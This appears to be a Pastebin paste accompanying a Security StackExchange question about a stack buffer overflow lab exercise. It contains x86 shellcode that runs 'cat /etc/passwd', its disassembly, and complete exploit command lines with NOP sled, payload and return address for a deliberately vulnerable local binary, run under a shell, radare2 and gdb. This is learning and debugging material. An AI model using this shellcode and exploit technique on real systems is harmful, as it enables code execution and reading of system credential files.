API tools faq
paste
Guest User

Question details

a guest
Jan 14th, 2017
281
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 3.04 KB | None | 0 0
raw download clone embed print report
  1. // Question URL: http://security.stackexchange.com/questions/148351/
  2. // Shellcode, which I built and intend to cat /etc/passwd. It worked just fine on several exploits I did before:
  3. char[] shellcode = "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
  4.  
  5. // Objdump of shellcode file:
  6. $ objdump -d shellcode.o
  7.  
  8. shellcode.o:     file format elf32-i386
  9.  
  10. Disassembly of section .text:
  11.  
  12. 00000000 <_start>:
  13.    0:   31 c0                   xor    %eax,%eax
  14.    2:   99                      cltd
  15.    3:   52                      push   %edx
  16.    4:   68 2f 63 61 74          push   $0x7461632f
  17.    9:   68 2f 62 69 6e          push   $0x6e69622f
  18.    e:   89 e3                   mov    %esp,%ebx
  19.   10:   52                      push   %edx
  20.   11:   68 73 73 77 64          push   $0x64777373
  21.   16:   68 2f 2f 70 61          push   $0x61702f2f
  22.   1b:   68 2f 65 74 63          push   $0x6374652f
  23.   20:   89 e1                   mov    %esp,%ecx
  24.   22:   52                      push   %edx
  25.   23:   51                      push   %ecx
  26.   24:   53                      push   %ebx
  27.   25:   89 e1                   mov    %esp,%ecx
  28.   27:   b0 0b                   mov    $0xb,%al
  29.   29:   cd 80                   int    $0x80
  30.  
  31.  
  32. ----------
  33.  
  34. // Command lines and arguments:
  35. // I try to exploit the program using several ways, I'll paste here few:
  36.  
  37. // Simple shell execute //
  38. $ ./vuln $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
  39.  
  40. // or read the payload from a file
  41. $ ./vuln $(cat payload)
  42.  
  43.  
  44. // RADARE2 //
  45. // Open the program in radare2:
  46. $ r2 -d ./vuln // open in debug mode
  47.  
  48. // inside r2:
  49. // Reopen in debugger mode with args
  50. doo `!!python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"'`
  51.  
  52.  
  53. // GDB //
  54. (gdb) run $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
  55.  
  56.  
  57.  
  58. // System details //
  59. $ uname -a
  60. Linux megabeets 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  61.  
  62. $ file vuln
  63. ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=47ddbe5ef3c4c647670a8be51f2975c11a3501a6, not stripped
  64.  
  65. // The program compiled using this GCC Command
  66. $ gcc vuln.c -o vuln -fno-stack-protector -m32 -z execstack
  67.  
  68.  ///////////////////
  69.  // More details //
  70.  /////////////////
  71.  
  72.  // Offset in payload that is overriding EIP: 76
  73.  // Payload length: 80
  74.  // NOP-sled length: 28
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!